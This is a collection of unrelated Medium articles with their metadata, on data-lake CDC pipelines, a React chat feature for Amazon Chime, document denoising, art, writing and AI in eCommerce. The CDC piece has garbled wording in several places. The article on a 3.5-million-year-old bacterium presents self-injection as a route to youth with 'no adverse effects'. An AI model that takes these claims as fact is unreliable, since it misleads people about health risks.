Orchestrating change data capture to a data lake Building change data capture(CDC) with Spark Streaming SQL What is change data capture? If you are a data engineer, CDC will not appear foreign to you. It is an approach to data integration that is based on the checking, capture and delivery of the change to the data source interface. CDC can help loading the source table into your data lake. There is huge amount of data stored in the database or application source and the data team would want to analyze this table. Running queries against the live production database could result in degradation of performance for the external application. The CDC process/pipeline is used to load the table to the external data lake. The apps that need access can use ETL or ad-hoc on the target table stored in the data lake for analysis. Possible architectural considerations There are a lot of CDC solutions, including incremental scheduled import jobs or real time jobs. Sqoop is an open source tool that could be used to transport data between Hadoop and relational database. The team can build daily jobs which could be used to load the data into the data lake. This could still create a huge load on the database and affect performance. Hence, the schedule needs to be worked out to make sure application performance is not affected. This scenario could severely limit real time queries and analysis on top of limitations that Sqoop additionally has. The problem with the previous architecture is the load and bottleneck it creates on the application database. To solve for those issues we can use binlog. The binlog is a set of sequence log files that could then record or insert, update, delete operations. For this streaming CDC pipeline using binlog, first, we can use some out source to us, like JSON or Maxwell to sync binlog to Kafka or some other comparable service. Then the apps downstream can leverage Spark streaming to consume the topic from Kafka sequencing. Sequencing parses up binlog record into the targeted storage system. We could support Insert, Update, Delete, like Kudu or data or HBase. This solution comes with a set of operational challenges if the data is too large especially with Kudu. Based on our previous architectural consideration, binlog will limit load on application database but it will result in a few other challenges. We can solve for those operational challenges and issues using Spark Streaming SQL. We could build a CDC process/pipeline using Spark Streaming SQL. We can drive Streaming SQL to parse the binlog and merge them into a data lake. Orchestration for Spark Streaming SQL SQL is a declarative language. Almost all of the data engineers have SQL skills especially in database and data warehouse like MySQL, HIVESQL or SparkSQL. The advantage of using Stream SQL, even if the developers are not familiar with Spark Streaming or Java or Scala, they can still easily develop streaming processing. Additionally, it is also low cost if you want to migrate from best SQL job to a Streaming SQL job. As a part of this orchestration, we should have sync the binlog of the table to Kafka using Debezium or other similar products. Binlog is a different format hence, the binlog parser will also be different from a normal parser. We can use Spark Streaming SQL to consume the binlog from Kafka, and parse the binlog using the operation type of this record, like insert, update or delete, then we can merge this past record data to the data lake. Internally, Spark Streaming receives live input data streams and divides the data into batches, which are then processed by the Spark engine to generate the final stream of results in batches. Step one, we should create two tables, one source which is the Kafka table, and another is target data table. Step two, we create a streaming scan on top of the Kafka table and set some parameters in options clause, like studying offsets, max offset per trigger. Step three would house the major logic of the CDC pipeline. We create a screen to wrap the merge into statements and the job parameters. Step four, we can use Streaming SQL command to launch the SQL file. This command will launch a client mode streaming job. Once that is set and the job runs, we can view the CDC streaming pipeline. At this point, we can check that we can query the data table in the outer link, if there are some data changes in the source database table and they should match. For each batch of the streaming, we call the data’s merge function to merge the parse binlog record into the target data table. That should finish the orchestration. Post this setup, we will need to setup monitoring and metrics on each step of this process. These metrics should provide us with values to visualize bottlenecks and the flow of data. In addition, we need to setup alerts on the operational metrics. These would allow the team to consume and respond to alerts respectively. Conclusion The process above should be able to provide a way to setup a basic CDC pipeline which can handle billions of CDC events relatively well. We can also do the update, delete of mode of ratio on the data table. On top of the solution the team could support schema enforcement and evolution which can provide better data quality and data management. Time travel provides snapshots of data, then we can query any earlier worsening of the data. Only Spark can write data through data, including batch mode and streaming mode, and leverage Presto on how spark can query data from data.
https://medium.com/acing-ai/orchestrating-change-data-capture-to-a-data-lake-283048656d98
['Vimarsh Karbhari']
2020-09-10 14:45:42.720000+00:00
['Machine Learning', 'Data Science', 'Artificial Intelligence', 'Data Engineering', 'Spark']
Add Chat Feature to Demo of Amazon Chime SDK React Component Library
Add Chat Feature to Demo of Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note: This article is also available here.(Japanese) https://cloud.flect.co.jp/entry/2020/11/30/125920 In our last article, we posted a brief introduction to the Amazon Chime SDK React Component Library. At the time of writing, the latest update of this library, ver 1.5.0, added Chat-related components. I’m going to use it to add Chat functionality to an official AWS demo. Like this. Note: that this article is a bit complicated, using React coding. If you simply want to run the code, the URL of the repository is given at the end of this article, so you can get the code from there and run it. At First This time, we will add Chat functionality based on the demo provided by the official. First, make sure you have a working sample of ver 1.5.0, referring to the previous article. Approach Generally, the Amazon Chime SDK React Component Library provides React components as well as hooks and providers (Context APIs) that work behind the components to make it easier to use Amazon Chime’s features. With the addition of the Chat-related components, I was hoping that they would provide providers or hooks to enable Chat functionality, but unfortunately, they haven’t yet. This issue says that you should implement it yourself with data messages for real-time signaling. Please refer to my previous article on data messages for real-time signaling. So, I would like to implement a provider that uses data messages for real-time signaling by myself. RealitimeSubscribeChatStateProvider We will name the provider we will create as RealtimeSubscribeChatStateProvider. The following is a brief description of the content of the provider, in excerpts that we think are important. The entire source code can be found here. Call userealitimeSubscribeChatState() of this provider so that you can refer to the Chat features and data. Definition of State Define the State (Chat function and data) provided by userealitimeSubscribeChatState(). If you just want to create a simple Chat function, the following two variables should be sufficient. export interface RealitimeSubscribeChatStateValue { chatData: RealtimeData[] sendChatData: (mess: string) => void } The RealtimeData used in the interface is the actual data to be sent and received. In this article, we have defined the following data structure. export type RealtimeData = { uuid: string data: any createdDate: number senderName: string //<snip> } useRealitimeSubscribeChatState() The method to provide the above State is as follows: when creating a provider using the Context API, I think it’s almost formulaic, so I won’t describe it. export const useRealitimeSubscribeChatState = (): RealitimeSubscribeChatStateValue => { const state = useContext(RealitimeSubscribeChatStateContext) if (!state) { // handle exception } return state } Definition of Provider Sending and receiving data messages for real-time signaling is done by AudioVideoFacade. You can get a reference to this AudioVideoFacade with useAudioVideo() (1–1), and you can get the username with useAppState() (1–2). The user name can be retrieved with useAppState() (1–2). The Chat text data is managed by this provider using useState. (1–3) In (2–1), we define a data transmission function using data messages for real-time signaling. We call the method of audioVideo (AudioVideoFacade) to send the data. In this time, we specify “CHAT” because we can specify the topic (2–2). Also, since the sender can’t receive the sent data , you should add the sent data to the Chat text data after sending(2–3). useEffect registers (and deletes) a function for receiving data messages for real-time signaling (3–1), (3–2). The receive function itself just parses the received data and adds it to the text data of Chat, as shown in (3–3). export const RealitimeSubscribeChatStateProvider = ({ children }: Props) => { const audioVideo = useAudioVideo() // <----- (1-1) const { localUserName } = useAppState() // <----- (1-2) const [chatData, setChatData] = useState([] as RealtimeData[]) // <----- (1-3) const sendChatData = (text: string) => { // <----- (2-1) const mess: RealtimeData = { uuid: v4(), data: text, createdDate: new Date().getTime(), senderName: localUserName } audioVideo!.realtimeSendDataMessage("CHAT" as DataMessageType, JSON.stringify(mess)) // <----- (2-2) setChatData([...chatData, mess]) // <----- (2-3) } const receiveChatData = (mess: DataMessage) => { // <----- (3-3) const data = JSON.parse(mess.text()) as RealtimeData setChatData([...chatData, data]) } useEffect(() => { audioVideo!.realtimeSubscribeToReceiveDataMessage( // <----- (3-1) "CHAT" as DataMessageType, receiveChatData ) return () => { audioVideo!.realtimeUnsubscribeFromReceiveDataMessage("CHAT" as DataMessageType) // <----- (3-2) } }) const providerValue = { chatData, sendChatData, } return ( <RealitimeSubscribeChatStateContext.Provider value={providerValue}> {children} </RealitimeSubscribeChatStateContext.Provider> ) } GUI Next, I’m going to go over the part that displays the Chat screen. Here is another excerpt of what we think is important. Adding RealitimeSubscribeStateProvider Modify the DOM of MeetingView to allow the above created providers to be used in the conference room. Add a real-timeSubscribeStateProvider to the (1) part. This will allow the Chat feature to be used in the subordinate Views. const MeetingView = () => { useMeetingEndRedirect(); const { showNavbar, showRoster, showChat } = useNavigation(); return ( <UserActivityProvider> <StyledLayout showNav={showNavbar} showRoster={showRoster || showChat}> <RealitimeSubscribeStateProvider> // <--- (1) <StyledContent> <MeetingMetrics /> <VideoTileGrid className="videos" noRemoteVideoView={<MeetingDetails />} /> <MeetingControls /> </StyledContent> <NavigationControl /> </RealitimeSubscribeStateProvider> </StyledLayout> </UserActivityProvider> ); }; ChatView In (1), we get the chat data and a reference to the data sending function using the userealitimeSubscribeChatState() we created earlier. In (2–1) and (2–2), we use the Chat component of the Amazon Chime SDK React Component Library to generate the display part (more on this later). (3) calls the send function of the chat data. const ChatView = () => { const { localUserName } = useAppState() const { closeChat } = useNavigation(); const { chatData, sendChatData } = useRealitimeSubscribeChatState() // <---- (1) const [ chatMessage, setChatMessage] = useState(''); const attendeeItems = [] for (let c of chatData) { // <---- (2-1) const senderName = c.senderName const text = c.data const time = (new Date(c.createdDate)).toLocaleTimeString('ja-JP') attendeeItems.push( <ChatBubbleContainer timestamp={time} key={time+senderName}> // <---- (2-2) <ChatBubble variant= {localUserName === senderName ? "outgoing" : "incoming"} senderName={senderName} content={text} showTail={true} css={bubbleStyles} /> </ChatBubbleContainer> ) } return ( <Roster className="roster"> <RosterHeader title="Chat" onClose={()=>{closeChat}}> </RosterHeader> {attendeeItems} <br/> <Textarea //@ts-ignore onChange={e => setChatMessage(e.target.value)} value={chatMessage} placeholder="input your message" type="text" label="" style={{resize:"vertical",}} /> <PrimaryButton label="send" onClick={e=>{ setChatMessage("") sendChatData(chatMessage) // <---- (3) }} /> </Roster> ); } The rest you have to do is enable this ChatView to be displayed from a navibar. The display from the navibar is not essential in this case, and it contains several minor modifications, so I will not describe it. Please check the changes from the repository’s commit log. Run Now, let’s see how it works. If you type a message like this, you’ll see a message on your screen with the other person. For your own message (which has an outgoing variant attribute), it will be a blue speech bubble. For other messages, it will be a white speech bubble. You can toggle the display of the balloon’s tail (which, in cartoon terms, indicates where the balloon originates) by using the tail attribute, but you can’t change its direction. Otherwise, you can omit the time or add action buttons. Repository You can find the source code for this one in the “chat_feature” branch of the following repository You can launch it in the same way as the way we ran the demo in the previous article, so check out how it works. Finally This is a look at adding chat functionality to the official Amazon Chime SDK React Component Library demo. Although I had to touch the raw Amazon Chime SDK a bit, I was able to create a chat GUI that was consistent with the other components without too much effort. In addition to the chat function introduced here, the following repositories provide a version with a whiteboard function. Also, Cognito integration and virtual backgrounds are implemented in the following repositories. Virtual Background Whiteboard
https://medium.com/swlh/add-chat-feature-to-demo-of-amazon-chime-sdk-react-component-library-9379f6e43e58
[]
2020-12-13 06:48:39.032000+00:00
['JavaScript', 'React', 'AWS', 'Videoconference']
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life
The 3.5 Million-Year-Old Bacteria That Could Be the Answer to Eternal Life Are we meant to live eternally? Ancient bacteria from 3.5 million years ago also known as Bacillus F strain (Source: MIMS) For centuries, humans have been in the look for a source of eternity or a potion that can bring you back to your youth. Many legends and stories from ancient histories most probably inspired by witches show the possibility of becoming younger. In our philosophy, we see aging and dying as a natural phenomenon that is meant to be the way it is. However, some people are simply thirsty for eternal life. So much that they would even risk injecting themselves with this bacteria. Over the 21st century, there have been two recorded cases, of people injecting themselves with this bacteria as well as claiming that they are feeling younger and healthier. But before we go into these cases, we must have a look at what does this bacteria actually presents itself to be as well as it’s believed origin. Bacillus F This bacteria, known as Bacillus F was discovered in 2009 by researchers from Mammoth Mountain in the northern Siberian region of Yakutsk. From the analyses done by the University of Moscow, the bacteria seems to originate from around 3.5 million years ago, around when mammoths were alive. The bacteria has been closely studied and from the read on the DNA it presented, it seemed to have the potential of giving the injected organism longevity of life and an increase in fertility. The first organism to be tested with the bacteria was a couple of mice. The results were quite clear, all the mice that had been injected with the bacteria presented a longer lifespan. What is even more interesting is that the mice were also still fertile at a very old age. Epidemiologist Viktor Chernyavsky, who took part in the study mentioned that the bacteria gives out biologically active substances during its long life cycle or as long as the organism keeps it alive. As an expert, Chernyavsky had positively confirmed that the bacteria did give longevity within mice as well as enhanced the fertility within the mice tested. The first person to be injected with the bacteria Even if the tests showed that the bacteria does not harm the mice of an organism, it still was considered dangerous to have it introduced into a human organism, at least until more research was done. However, someone became impatient and wanted to know if this was the “elixir of life” as it was nicknamed by some of the scientists within the field. Anatoli Brouchkov (Source: Vice) Anatoli Brouchkov was from the department of geocryology, the department which focuses on the study of glacier regions and regions that have been permanently frozen. The scientist wanted to know the truth about the bacteria so bad that he injected himself with the bacteria with no permission from his higher-ups. Brouchkov knew that the bacteria wasn’t going to harm him as it can be found in the water from where it has been extracted in Siberia. This region has some secluded villages from which people have gathered and consumed the same water infested with the bacteria for years without causing them any harm. In an interview with Jordan Pearson from VICE, Brouchkov mentioned that the bacteria never affected him in a negative way, only positive. He mentioned that he wasn’t getting younger from a physical appearance, but he was feeling less tired as if he was younger and much healthier. We all know that with age, it is common to not only get tired much quicker but also get sick more often. Besides all this, the most interesting claim that Brouchkov made was that he didn’t suffer from any sort of sickness or illness for more than two years since injecting himself with the bacteria. Besides this virus being quite primitive for its age, the biological mechanism is extremely complex, making it very difficult for scientists even with the state of the art technology to understand the way it affects the organism it inhabits. Brouchkov ended his media appearance by stating that he does truly believe that the Bacillus F bacteria is the key to immortality. Besides this bacteria, there are many others that have been in a state of permafrost for hundreds of thousands of years with remarkable complexity. Many scientists define these bacterias to have been the cause of our ancestor’s great immune system and long lifespan. Another person taking the “elixir of youth” A more recent case was recorded in 2017 by a German actress know as Manoush. The only difference, in this case, is that Manoush took more doses over a period of three months. Since 2015, the research team from the University of Moscow had been able to unlock the DNA code of the bacteria, gaining even more information on its eternal abilities, but also confirming that the bacteria can live forever. Photo of Manoush and injection with the bacteria, 2017 (Source: Daily Mail) She claims that since taking the vaccine she has not only felt younger but is getting younger from a physical perspective. Although the idea of getting younger from a physical perspective is a bit more difficult to believe in her case due to all the plastic surgeries she had undergone in the previous years. There is still a possibility from a scientific point of view. The actress also mentioned that her skin feels much softer and what is most important is the fact that she would get hay fever every year (something common in many people). Since taking the bacteria she didn’t have hay-fever anymore, in fact, no type of illness or sickness just like in Brouchkov’s case. Scientists asked for blood samples from her every month during the three month period she injected herself with the bacteria. She has the desire of living until the age of 100 in a “fully functional body”. As there are no adverse effects from the injections with Bacillus F, she continues taking the bacteria.
https://medium.com/history-of-yesterday/the-3-5-million-year-old-bacteria-that-could-be-the-answer-to-eternal-life-a98e7c693759
['Andrei Tapalaga']
2020-12-25 21:02:41.238000+00:00
['Health', 'History', 'Science', 'Life', 'Medicine']
Denoising Noisy Documents
Numerous scientific papers, historical documentaries/artifacts, recipes, books are stored as papers be it handwritten/typewritten. With time, the paper/notes tend to accumulate noise/dirt through fingerprints, weakening of paper fibers, dirt, coffee/tea stains, abrasions, wrinkling, etc. There are several surface cleaning methods used for both preserving and cleaning, but they have certain limits, the major one being: that the original document might get altered during the process. I along with Michael Lally and Kartikeya Shukla worked on the data set of noisy documents if from the UC Irvine NoisyOffice Data Set. Denoising dirty documents enables the creation of higher fidelity digital recreations of original documents. Several methods for denoising documents like — Median Filtering, Edge Detection, Dilation & Erosion, Adaptive Filtering, Autoencoding, and Linear Regression are applied to a test dataset and their results are evaluated, discussed, and compared. Median Filtering Median filtering is the simplest denoising technique and it follows two basic steps: first, obtain the “background” of an image using Median Filtering with a kernel size of 23 x 23, then subtract the background from the image. Only the “foreground” will remain, clear of any noise that existed in the background. In this context, “foreground” is the text or significant details of the document and “background” is the noise, the white space between document elements.
https://towardsdatascience.com/denoising-noisy-documents-6807c34730c4
['Chinmay Wyawahare']
2020-07-01 06:10:04.068000+00:00
['Machine Learning', 'Computer Vision', 'Data Science', 'Neural Networks', 'AWS']
Questioning Things
I’ve long been a fan of the artist Grayson Perry. In my opinion he speaks a lot of sense, and has a great ability to make art seem more accessible. But I’ve gained even more of an appreciation recently. Mainly because I finally got round to reading his book — ‘Playing to the Gallery’. In it he debunks a lot of myths about the art world, what counts as art, and ways to view it. He also talks about the role of the contemporary artist. And in doing so there’s one thing which really stuck in my mind. He said; “my job is to notice things that other people don’t notice” It likely struck a chord, because ‘noticing things’ is an inherent character trait of strategists. So, it kind of goes with the territory. But it’s also because it highlighted one of the big reasons why I’m drawn to certain artworks over others. And that’s because of the artist’s ability to successfully notice, reframe and reflect the cultural psyche in a way that’s easy to understand and relate to, and, at best, completely change the way that you see something. So while noticing things is one thing, a large part of how impactful a piece of work is in how well it effectively communicates these otherwise ‘unnoticed’ things. How much it challenges, questions and reframes existing ideas. And importantly how much it resonates. This is as true of art, as it is of any kind of visual communications. But noticing, and communicating the most useful or relevant insight, or idea is easier said than done. It’s also somewhat of a strategist’s holy grail. So this got me thinking. How do artists notice things? And what, if anything, can we can learn from that? Noticing starts by asking interesting questions. And art is a great lesson in how to ask. As Ai Weiwei said: “I always think art is a tool to set up new questions. To create a basic structure which can be open to possibilities is the most interesting part of my work…” The ability to ask questions is one of the great powers of art. Both in terms of output (the idea or assumption the artist is questioning with their work) but also in terms of input (what kinds of questions they ask in the first place, and what possibilities it opens up). Asking a good question can make the difference between a great work and a flop. A mediocre piece, and a piece which stops you in your tracks. A piece which invites new conversation, and lays the path for things to come. The ability to ask questions is also a key part of a strategist’s toolbox — from questioning the brief (‘what problem are we trying to solve?’) to interviewing stakeholders and audiences to questioning the usefulness of an insight or idea. So, I started to look at how art asks questions, to see how that could help me in my day-to-day role. And in doing so I found three distinct themes that consistently crop up: Question what you see Question how you see Question what isn’t being seen Three powerful questions to ask when approaching any new challenge or client brief. Let’s unpack that a bit further. In order to ‘notice’ the interesting things, the ‘things that others don’t notice’, it’s important to look beyond the obvious. To forget what you know, and look at things through a fresh lens. To question what you see. Artists are masters of this. They constantly challenge themselves and their audience to forget their assumptions. Deliberately playing with perceptions of reality, to reframe the way that something is seen. The work of conceptual artist Joseph Kosuth is a prime example of this. He often commented on the gap between language, image and meaning in his work. ‘One and Three Chairs’, for example, simultaneously showcases a physical chair, a photograph of a chair and a written definition of a chair. On the surface all three chairs represent the same idea (the chair), yet are not the same at all. It’s a great lesson in not taking things at face value. And by stating the ‘obvious’ he successfully create the kind of ‘aha’ moment that leaves a lasting impression. When it comes to strategy, stopping to question what you see is key. Asking for example — What is the real question in the clients brief? What’s the real problem we’re trying to solve? and is what people say really what they mean? But it’s equally useful to question how you see. As Kosuth’s work shows — it’s important to be aware of our own filtering process (i.e. how we instinctively see things). But it’s also important to be aware of the filtering process which is happening all around us. So while Kosuth draws attention to the nuances of interpretation and assumption, he equally questions how something is represented impacts how it is seen. In part, this comes down to context. In art, as in marketing, context is critical. The format, time and surroundings through which an idea is delivered can completely shift its meaning, impact and relevance. So it’s pretty useful to consider when thinking about how to communicate the story that needs to be told. Christian Marclay’s mesmerising and award winning video piece ‘The Clock’ highlighted this all too well. Excerpt from ‘The Clock’ via YouTube In it he stitched together thousands of video clips of clocks, from film and TV history, and played them out in real-time over 24 hours. Taking the clips in isolation, he makes tiny ‘unnoticed’ moments the centrepiece. And by editing out complexity completely shifts the narrative. Making you consider the films, and the concept of time in a whole new way. As Paul Klee said — “Art does not reproduce the visible; rather, it makes visible”. And Marclay’s piece does a brilliant job of doing just that. So, finally, and importantly, as Klee reminds us - question what isn’t being seen. One of the great roles of art is to unlock, comment and shape culture. A lot of the time this involves, not just questioning what is in plain sight, but what is hidden from view. The Guerrilla Girls offer just one example of this. Coined ‘the conscience of the art world’ they are a group of anonymous feminist activist artists that “wear gorilla masks in public and use facts, humor and outrageous visuals to expose gender and ethnic bias as well as corruption in politics, art, film and pop culture”. As they say, “… we undermine the idea of a mainstream narrative by revealing the understory, the subtext, the overlooked, and the downright unfair”. Guerrilla Girls Images and Posters 1985–2018 via YouTube Questioning what isn’t seen, or noticed, is the core theme of their work. But it’s also one which has the power to create real cultural change. Seeping into mainstream culture, since 1985 they have tirelessly campaigned for change. Inspiring countless activist-artists and fans as they go. Questioning what isn’t being seen, or said, and making it visible is at the heart of any truly insightful piece of work. But when it comes down to it a lot of the most powerful work has an authenticity to it that’s truly relatable, meaningful, and memorable. It comes from expressing a central belief that is true to who the artist is. And creating a genuine connection with the person who’s viewing it. And when they ask the right questions they have the power to capture attention, shift perceptions, and, ultimately drive behavioural change. When it comes to working out the most useful way forward for brands, there’s something that can be learnt from that. Question what you see, Question how you see it, but importantly, Question what isn’t being seen. Often that’s where the most important messages lie.
https://medium.com/a-strategists-guide-to-art/questioning-things-b7aba5253828
['Harriet Kindleysides']
2020-11-12 10:13:58.308000+00:00
['Brand Strategy', 'Marketing', 'Strategy', 'Creativity', 'Art']
5 Better Things to Do Instead of Staring at a Blank Page
Photo by Alessio Linon Unsplash 5 Better Things to Do Instead of Staring at a Blank Page When you’re stuck, take a break. Every writer feels stuck every once in a while. The words don’t seem to come up, and the few that do simply do not fit together. Your thoughts are either muddled or non-existent. Yet, you persist. You stare at the blank page, commanding your brain to come up with something, but it’s useless. Writing is something that’s just not happening for you today, and forcing it might actually make your writer’s block worse. Here’s 5 better things for you to do than insist on staring at that blank page: Go for a walk Walking is an effective way to relieve stress and boost creativity. Charles Dickens and Jane Austen are only a few of many writers known to have enjoyed long walks on a frequent basis. There’s something about the repetitive, rhythmic movements of walking that induces a meditative state. Recently, many authors’ instinctive preference for walking to induce creative output has been veryfied by science. Stanford researchers have found that “a person’s creative output increased by an average of 60 percent when walking.” (Source) A 60% increase in creative output is nothing to sneeze at. Going for a walk offers the added advantage of taking your eyes off the screen for a few minutes. It forces you to take a look at the world around you, and that alone might offer you the breakthrough you’ve been hoping for. Exercise While walking is a form of exercise, you can go one step further and do a more intense workout, such as running, biking, swimming, weightlifting. Exercising offers many benefits in improving cognitive function, not to mention your overall health. For me, an intense workout is the best form of meditation. While I can still “write in my head” while walking, when I go on a run my mind actually clears of all thought for a few minutes, and that creates the right mindset for welcoming new ideas. Post exercise, there’s a blissful exhaustion that makes me feel completely renewed and ready for another writing session. Talk to a friend Talking to a friend forces you get out of your own head for a few minutes. It’s easy to mistake isolating yourself with fostering a creativity-friendly environment. While writing is indeed a lonely occupation, sometimes breaking out of isolation is exactly what you need to get out of a creative rut. Talking to a friend brings you a new perspective about life. It reminds you that your blank page with its blinking cursor are not all that matters in the world. There are people out there who have other problems, other projects, other sources of joy. Reminding yourself of that every once in a while shifts your perspective and unlocks new ideas. Getting in touch with someone else’s reality helps you understand how you’ve blown your own creative rut out of proportion by focusing on it exclusively. Play — by yourself, with your kid, or with your pet “Play brings joy. And it’s vital for problem solving, creativity and relationships.” — Margarita Tartakovsky, M.S. We tend to think of play as only for children, but the reality is that adults benefit from play just as much. If you’re playing by yourself or with friends, try to pick something that doesn’t involve the use of screens, to give yourself a break from that. If you’re a parent, enjoy the opportunity to play with your kid. Children are not familiar with all the rules of the world yet, so they are less burdened by constraints on creativity. Ever seen a child paint a picture in which the grass is pink and the dog, green? Sure, grass isn’t pink in the “real world, “ but why can’t the grass be pink and the dog green in her world? When you get immersed in play with children, you begin to see things in an entirely new perspective. You become aware of your own arbitrary rules, and start to question yourself, why can’t things be different? If you’re not a parent yourself, play with a niece, a young cousin, or your friend’s kids (with permission and parental supervision, of course), or play with your pets. Pets are not the same as children, but you’d be surprised at all the creative ways cats and dogs play when you give them the freedom to be creative. My dog is always surprising me with how she choses to play with her toys — and with the stuff she thinks of as her toys (like my socks, or the toilet brush). If you don’t have a pet, you can ask a friend to let you play with theirs— most pet owners would appreciate the extra hand (I know I would), and there are plenty of animal shelters that allow volunteers to spend time playing with the animals. (Side note: always be careful letting children and animals play together. Make sure you know both the child and the animal well, and be careful to prevent any accidents. Your dog biting the neighbor’s kid is not going the outcome you want.) Cook Cooking is an excellent option to get your eyes off a screen and your hands into something tangible. As you focus on following a recipe, on measuring and preparing the right ingredients, on minding the stove and the oven so you don’t burn your food to a crisp, you’ll find that your mind contemplates ideas in the background, much like when walking or meditating. It doesn’t matter how skilled you are, you can always find a recipe that’s right at your level, besides, part of the fun of cooking is improving your skills and trying new things. If you’re a beginner, don’t put too much pressure on yourself to make something perfect: allow yourself to make mistakes. Embrace messing up as part of the process. When you’re stuck, get your mind out of writing Many writers mistakenly believe there’s only one solution to writer’s block, which is to push through, or to seek inspiration in writing-related activities, such as doing writing exercises or reading, but that’s not exactly true. In writing, there’s a time to push through, and a there’s a time to step away. With practice, you can easily identify the difference between these two moments. If if you suspect you’re stuck beyond the point where pushing through can help, step away from the computer. Turn your brain off of “writing mode,” release it to think of other things — or to simply not think at all. You’ll be surprised at what your brain can come up with after taking a break like that.
https://medium.com/a-life-of-words/5-better-things-to-do-instead-of-staring-at-a-blank-page-d1c4edf75ece
['Renata Gomes']
2020-07-15 21:01:44.645000+00:00
['Self', 'Writing Tips', 'Creativity', 'Writing', 'Self Improvement']
Top 5 Use Cases of AI in eCommerce
When Apple introduced its first iPhone — it was literally a shift in the paradigm of what we always viewed phones to be. Since then, there have been several significant evolutions in technology, but nothing can compare to the biggest of them all — Artificial Intelligence. Don’t agree? AI is having a bearing on almost every conceivable thing and I suppose I don’t even need to elucidate on the broad applications of this incredible new domain. Naturally, it was about time the benefits of AI be implicated in the most lucrative business of the 21st Century — eCommerce. Almost every significant step of commerce over the internet can be transformed by implementing AI. Every significant step like Visiting the retailer’s website, adding products to cart, Placing an order and even Checkout can be automated using the capabilities of AI. In this article, I would try and shed some light on the practical and significant use-cases of AI in eCommerce and how your eCommerce business can leverage it at this moment in time! There seems to be a lot of conundrum on the subject of AI in eCommerce, so let’s put an end to this discussion, once and for all, shall we? 5 Use-Cases of AI in eCommerce 1. Better Search Results It has been observed that customers end up abandoning their purchase because often the product results displayed turns out irrelevant. Through AI organizations are trying to display customer-centric search results that are relevant to their desired ask. eCommerce websites are increasingly leveraging NLP (or Natural Language Processing) and Image Recognition to better comprehend user language and produce better product results. Trending GoBeyond.ai articles: 2. Strategies Best Practices for Managing E-Commerce Customer Service 3. Top 15 Magento 2 Extensions For Your E-Commerce Site 4. How Free Influencers Took My Brand To Global Success Yandex, a popular search engine, successfully implemented some advanced applications of NLP and Deep Learning to optimize future searches with the help of the data of previous searches. This turned out to be a massive success as they were able to increase their click-through rates by almost ten percent. Clarifai is trying to improve ecommerce by building smarter applications that can see the world as people would. In their words, “Artificial Intelligence with a Vision.” These applications enable the developers to build more intelligent apps and at the same time empower business by providing a customer-centric experience. A demonstration of how Pinterest Lens work. Pinterest is partnering with ecommerce stores for its new offering Pinterest Lens to find matching items in the store directly from their image on Pinterest. This is great from the standpoint where people generally abandon their search because they aren’t able to find the relevant product. Developments such as these are not just helping businesses generate better revenues, but are also reducing customers’ journey. Recommended Read: 5 Tips to Ensure Impeccable Security for Your eCommerce Business 2. Shopping Experience Level 1001! How do you enhance the user’s shopping experience? Make it as real as possible! If you want to understand just how much Google knows about you, go check out your Google Maps Timeline! The devices that you use collect and store a ton of information about you. This data is extremely valuable as the right type of information can enrich and improve your shopping experience. Deep Learning and Machine Learning technologies are able to utilize the smallest piece of data. For instance, even the hover that you made over a product is analyzed and evaluated to understand the likelihood of you buying that product. In practice, this personalization helps deliver images of related products, enticing offers related to the product, alerts related to that product, and dynamic content that alters according to demand and supply. AI engines such as Boomtrain acts as a bolt-on with your existing customer channels and helps businesses analyze how customers are interacting online. It also provides a unified view across all devices, monitoring and analyzing performances across different platforms. Companies like Criteo, are assisting Internet retailers to serve personalized online display advertisements to consumers who have previously visited the advertiser’s website. Through cross-device advertising, they are able to engage shoppers wherever they are online with premium-placed ads across desktop, mobile and social. AI is assisting in generating deep and relevant insights of data by analyzing and scanning through terabytes of data to efficiently predict human behavior. This scale of intelligence helps deliver a personalized shopping experience for the end-user. 3. Curbing Fake Reviews There’s a massive insurgence of fake reviews aimed at tarnishing the ratings of a good product. These reviews not only makes good products rank below but also cost companies billions of dollar. These stats are absolutely insane! Customer reviews are an integral part of the sales cycle. 87% of customers trust what they read without the blink of an eyelid. The last couple of years have seen a surge in talks around this subject and has consequently impacted the way customer perceive the information they encounter online, even if it is ostensibly written by a credible source. Artificial Intelligence is increasingly being deployed to analyze user reviews. For instance, Yelp has deployed a sentiment analysis technique to classify their review ratings. Through this technique, they organize the information into different data sets like business_id (ID of the business being reviewed), date (Day the review was posted), review_id (ID for the published review), stars (1–5 rating for the business), text (Review text), etc. On similar lines, Facebook has come up with its AI solution “fastText” for text classification and create supervised as well as unsupervised learning algorithms to obtain vector representation for words. 4. Sales Forecasting Earlier only God or Charles Xavier could have read your mind — but now — AI can too! Try and fathom an alternate reality where all your marketing efforts and expenditures are targeted only where the customer is likely to make a purchase. Your conversion rate will be at an all-time high, and you won’t waste your capital on customers who won’t buy. Being able to foretell how much of a given product will sell by a specific date will enable shop owners to stack up on inventory more efficiently, and simultaneously eliminate large sums of undesired cost. It is especially valuable for industries dealing with perishable products, which include not only groceries but also tickets of concert and transportation — anything that costs money when unsold. Also Read: How to build an awesome Ecommerce App Sounds too good to be true, right? AI solutions can gather historical data about past purchases and help your sales team better derive conclusions and make decisions. Besides, you won’t even need to sell your arms and legs to afford this either as these solutions are easily deployable, even by organizations with smaller budgets. Employing AI, businesses were able to derive relevant conclusions like – Suggesting products that should be promoted on a particular date Identify popular products that are making good sales Predicting what customers are likely to purchase in advance Determining the highest price a customer will pay for your product Targeted promotions Reduce fraud Improve supply chain management Enhance business intelligence Make the most money on your sales 5. Chatbots to the Rescue It might be so hard for you to feel special amongst an ocean of 7 Billion, right? Well, eCommerce websites are adopting chatbots to make you feel special. Companies are increasingly deploying chatbots to improve customer service & satisfaction. Go ahead and browse any ecommerce site, a little chatbox will pop-up asking you what you want to make a purchase of. Once you enter your requirements, you get filtered results specific to your taste. Let us list some benefits of deploying chatbots: Chatbots have increased customer conversion tremendously by reducing the labor for lazy buyers . . We have come so far from the time when chatbots offered just customary replies. Now they have become intelligent beings who understand and tackle a range of issues that they were earlier incapable of. who understand and tackle a range of issues that they were earlier incapable of. It is vital to provide real-time support to online shoppers as a recent study found that almost 83% of online shoppers need assistance while shopping and chatbots make it possible to provide real-time support. while shopping and chatbots make it possible to provide real-time support. Chatbots also provide a more personalized experience for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase the sales figures by up to 40%. Deploying chatbots helps to collect feedback more efficiently. Additionally, it can make it easier to track purchasing patterns and consumer behavior. Chatbots can provide efficiency, that too at an affordable price. Live support can be quite costly 